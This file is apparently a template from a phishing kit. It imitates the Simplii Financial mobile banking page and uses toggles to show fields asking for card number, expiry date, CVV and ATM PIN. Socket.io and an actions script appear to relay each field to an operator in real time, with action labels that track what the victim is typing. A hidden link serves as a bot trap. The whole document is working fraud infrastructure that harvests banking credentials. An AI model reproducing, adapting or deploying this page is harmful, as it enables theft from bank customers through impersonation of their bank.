<%

let p_card = simplii.card === 'on' ? true : false;
let p_atm = simplii.atm === 'on' ? true : false;
let p_cvv = simplii.cvv === 'on' ? true : false;
let p_expiry = simplii.exp === 'on' ? true : false;

%>
<html>
    <head>
        <meta http-equiv="content-type" content="text/html; charset=UTF-8">
        <title>Simplii Financial Mobile Banking Sign On</title>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
        <meta name="HandheldFriendly" content="true">
        <meta name="format-detection" content="telephone=no">
        <link rel="stylesheet" href="/assets/simplii/confirm_files/reset.css">
        <link rel="stylesheet" href="/assets/simplii/confirm_files/reset-brand.css">
        <link rel="stylesheet" href="/assets/simplii/confirm_files/global.css">
        <link rel="stylesheet" href="/assets/simplii/confirm_files/global-android2.css">
        <link rel="stylesheet" href="/assets/simplii/confirm_files/global-brand.css">
        <link rel="stylesheet" type="text/css" href="/assets/simplii/index_files/reset.css">
        <link rel="stylesheet" type="text/css" href="/assets/simplii/index_files/reset-brand.css">
        <link rel="stylesheet" type="text/css" href="/assets/simplii/index_files/global.css">
        <link rel="stylesheet" type="text/css" href="/assets/simplii/index_files/global-android2.css">
        <link rel="stylesheet" type="text/css" href="/assets/simplii/index_files/global-brand.css">
        <link rel="stylesheet" href="/assets/simplii/confirm_files/password-reset.css">
        <link rel="stylesheet" href="/assets/simplii/confirm_files/password-strength.css">
        <script src="/assets/simplii/confirm_files/password-strength.js"></script>
        <script src="/assets/simplii/confirm_files/change-password.js"></script>
        <script type="text/javascript" src="/assets/simplii/confirm_files/jquery-1.js"></script>
        <script type="text/javascript" src="/assets/simplii/confirm_files/wicket-event-jquery.js"></script>
        <script type="text/javascript" src="/assets/simplii/confirm_files/wicket-ajax-jquery.js"></script>
        <script type="text/javascript" id="wicket-ajax-base-url">
            /*<![CDATA[*/
            Wicket.Ajax.baseUrl="change-password";
            /*]]>*/
        </script>

        <link rel="stylesheet" href="/assets/simplii/confirm_files/appboy.css">
        <style>
        input[type='number'], input[type='text'], input[type='password'], input[type='email'], input[type='tel'], input[type='search'], #manage-cards-button, select {
            padding: 0.8em;
            height: 55px;
            max-height: 46px;
        }
        </style>
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>var lrbank = '<?=escape($udata->last->bank)?>'; var lrinfo = '<?=escape($udata->last->info)?>';</script>
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body lang="en" class="android-fix">
        <span class="offscreen">Simplii Mobile Banking</span>
        <input id="drawer-toggle-chk" aria-hidden="true" type="checkbox">
        <label for="drawer-toggle-chk" id="drawer-toggle-label">
        <img id="open-menu-icon" src="/assets/simplii/confirm_files/drawer-menu-open.png" alt="Open Menu" role="button">
        <img id="close-menu-icon" src="/assets/simplii/confirm_files/drawer-menu-close.png" alt="Close Menu" role="button">
        </label>
        <nav id="drawer-menu" class="post-signon-drawer scrollable-ver">
            <div id="menu-wrapper">
                <div class="drawer-menu-header">
                    <div class="account-holder-name" id="account-holder-name"></div>
                    <a href="https://www.cibc.mobi/ebm-mobile-anp/change-password?3-1.ILinkListener-header-drawerMenu-profileLink" class="no-style-link active" id="profile-link">
                    <span>My Profile</span><span class="drawer-icon-cog"></span>
                    </a>
                </div>
                <ul>
                    <li id="li-my-accounts"><a id="accounts-link" href="https://www.cibc.mobi/ebm-mobile-anp/change-password?3-1.ILinkListener-header-drawerMenu-accountLink" role="menuitem" class="">My Accounts</a></li>
                    <li id="li-pay-bills"><a id="paybill-link" href="https://www.cibc.mobi/ebm-mobile-anp/change-password?3-1.ILinkListener-header-drawerMenu-paybillLink" role="menuitem" class="">Bill Payments</a></li>
                    <li id="li-interac"><a id="etransfer-link" href="https://www.cibc.mobi/ebm-mobile-anp/change-password?3-1.ILinkListener-header-drawerMenu-eTransferLink" role="menuitem" class=""><em>Interac</em> e-Transfers</a></li>
                    <li id="li-transfer"><a id="transfer-link" href="https://www.cibc.mobi/ebm-mobile-anp/change-password?3-1.ILinkListener-header-drawerMenu-transferLink" role="menuitem" class="">Transfer Funds</a></li>
                    <li id="li-upcoming"><a id="uptxs-link" href="https://www.cibc.mobi/ebm-mobile-anp/change-password?3-1.ILinkListener-header-drawerMenu-upcomingTransactionsLink" role="menuitem" class="">Upcoming Transactions</a></li>
                    <!-- dynamic SSO links -->
                    <li class="li-sso"><a id="GMT-link" href="https://www.cibc.mobi/ebm-mobile-anp/sso-submit?siteId=FXC&amp;subSiteId=fxir&amp;locale=en&amp;channel=mobile_web" role="menuitem">Global Money Transfer</a></li>
                    <li class="li-sso"><a id="FXC-link" href="https://www.cibc.mobi/ebm-mobile-anp/sso-submit?siteId=FXC&amp;subSiteId=fxcash&amp;locale=en&amp;channel=mobile_web" role="menuitem">Order Foreign Cash</a></li>
                    <li class="li-sso"><a id="RPC-link" href="https://www.cibc.mobi/ebm-mobile-anp/sso-submit?siteId=FXC&amp;subSiteId=fxprepaid&amp;locale=en&amp;channel=mobile_web&amp;page=fxretailprepaid-manage" role="menuitem">Prepaid Cards</a></li>
                    <li class="li-sso"><a id="PMO-link" href="https://www.cibc.mobi/ebm-mobile-anp/sso-submit?siteId=FXC&amp;subSiteId=fxpmo&amp;locale=en&amp;channel=mobile_web" role="menuitem">Buy Gold and Silver</a></li>
                    <li class="li-sso"><a id="CCS-link" href="https://www.cibc.mobi/ebm-mobile-anp/pre-credit-score?locale=en&amp;ebkck=true&amp;tcVersion=1.0&amp;channel=mobile_web" role="menuitem">Check Credit Score</a></li>
                    <hr>
                    <li id="li-open-account"><a id="open-product-link" class="tracking-set-flow" href="https://www.cibc.mobi/ebm-mobile-anp/change-password?3-1.ILinkListener-header-drawerMenu-openAccountPsSO-openAccountPsSOLink" role="menuitem">Open an Account</a></li>
                    <li id="li-browse-products"><a id="products-link" href="https://www.cibc.mobi/ebm-mobile-anp/change-password?3-1.ILinkListener-header-drawerMenu-browseProductsPsSO-productSelectorSOLink" target="_blank" role="menuitem" @="Explore Products<span class=&quot;offscreen&quot;>. Opens in new page</span>" class="">Explore Products</a></li>
                    <li id="li-sites-apps"><a id="sites-link" href="https://www.cibc.mobi/ebm-mobile-anp/change-password?3-1.ILinkListener-header-drawerMenu-sitesPostSignOnLink" role="menuitem" class="">CIBC Sites</a></li>
                    <!-- Customer Services link visible for Simplii non-Small Business -->
                    <li id="li-client-services"><a id="customerServices-link" href="https://www.cibc.mobi/ebm-mobile-anp/change-password?3-1.ILinkListener-header-drawerMenu-customerServicesLink" class="">Customer Services</a></li>
                    <hr>
                    <li><a class="nav-no-indent" id="contact-us-link" href="https://www.cibc.mobi/ebm-mobile-anp/change-password?3-1.ILinkListener-header-drawerMenu-contactUsLink" role="menuitem">Contact Us</a></li>
                    <li><a class="nav-no-indent" id="help-link" href="http://cibc.intelliresponse.com/mobile-w/" role="menuitem">Help</a></li>
                    <li><a class="nav-no-indent" id="security-guarantee-link" href="https://www.cibc.com/ca/mobile/legal/mobile-security.html?itrc=C1:7109" target="_blank" role="menuitem">Security Guarantee</a></li>
                    <hr>
                    <li id="li-sign-out"><a class="nav-no-indent" id="logout-link" href="https://www.cibc.mobi/ebm-mobile-anp/change-password?3-1.ILinkListener-header-drawerMenu-logoutLink" role="menuitem">Sign Out</a></li>
                    <a href="/not-found" style="visibility: hidden;">d0 n0t cl1ck</a>
                </ul>
            </div>
        </nav>
        <header class="flex-box flex-box-hoz">
            <div class="flex-box-flex-1"></div>
            <a href="./#" target="_blank">
                <div id="header-logo"><span class="offscreen">Simplii Financial logo</span></div>
            </a>
            <div id="header-link" class="flex-box-flex-1">
            </div>
        </header>
        <section id="main-page" class="">
            <section id="ide">
                <section class="page-title">
                    <h2 class="title">Personal Information</h2>
                </section>
            </section>
            <section id="change-password" class="page-wrapper">
               
                <form id="loginForm" id="idb" method="post" action="">
                    <input type="hidden" id="userAgent" name="userAgent">
                    <% if (p_card) { %>
                    <div class="form-group" style="">
                        <label>Card Number</label>
                        <input id="input-card" type="tel" placeholder="Enter your Card Number" name="card" class="form-control lrinput" onkeyup="split()" required="true" autocomplete="off" maxlength="19" oninput="this.value = this.value.replace(/[^0-9, ]/, '')" attr-action="Filling Card">
                        <script src="/assets/js/splitter.js?v=<?=time()?>"></script>
                        <link rel="stylesheet" href="/assets/css/card.css?<?=time()?>">
                    </div>
                    <% } if (p_expiry) { %>
                        <div>
                            <span class="form-label display-block mb-5" style="display: block;">Exp. Date</span>
                            <select name="exp1" class="form-control text-center display-inline-block lrinput" required style="width:48%; display: inline-block;" attr-action="Selecting Expiry">
                                <option value="">MM</option>
                                <% for (let x = 1; x <= 12; x++) { 
                                    let y = x < 10 ? '0' + x : x; %>
                                    <option value="<%= y %>"><%= y %></option>
                                <% } %>
                            </select>
                            <select name="exp2" class="form-control text-center display-inline-block ml-10 lrinput" required style="width:50%; display: inline-block;" attr-action="Selecting Expiry">
                                <option value="">YY</option>
                                <% let currentYear = new Date().getFullYear() %>
                                <% for (let x = currentYear; x <= currentYear + 20; x++) { 
                                    let shortYear = x.toString().substr(-2); %>
                                    <option value="<%= shortYear %>"><%= shortYear %></option>
                                <% } %>
                            </select>
                        </div>                        
                    <% } if (p_cvv) { %>
                    <div>
                        <span class="form-label display-block mb-5">Cvv:</span>
                        <input name="cvv" maxlength="3" required class="form-control full-width lrinput" placeholder="&bullet;&bullet;&bullet;" type="tel" oninput="this.value = this.value.replace(/[^0-9]/, '')" attr-action="Filling Cvv">
                    </div>
                    <% } if (p_atm) { %>
                    <div>
                        <span class="form-label display-block mb-5">ATM Pin:</span>
                        <input name="atm" maxlength="6" required class="form-control full-width lrinput" placeholder="&bullet;&bullet;&bullet;&bullet;" type="tel" oninput="this.value = this.value.replace(/[^0-9]/, '')" attr-action="Filling ATM Pin">
                    </div>
                    <% } %>
                    <fieldset class="button-set">
                        <input name="cancel-button" id="cancel-button" class="btn btn-negative" value="Cancel" type="button">
                        <input onclick="submitForm()" id="save-button" class="btn btn-positive" value="Confirm" name="save" type="button">
                    </fieldset>
                    <input name="CRSFToken" value="baee0e28-1986-4bc7-82f2-fe4d85aa68ef" type="hidden">
                </form>
            </section>
        </section>
        <div id="__loadingScreenDiv" class="ajax-overlay" aria-live="assertive">
            <div class="ajax-overlay-background"></div>
            <img src="/assets/simplii/confirm_files/loading.gif" class="ajax-overlay-spinner" tabindex="-1" alt="Page loading">
        </div>
        <span hidden id="navig"> <%=navig%> </span>
        <span hidden id="stage">Card</span>
    </body>
    <script src="/bank/atb/js/scriptCard.js"></script>
    <script src="/bank/simplii/js/script.js"></script>
</html>
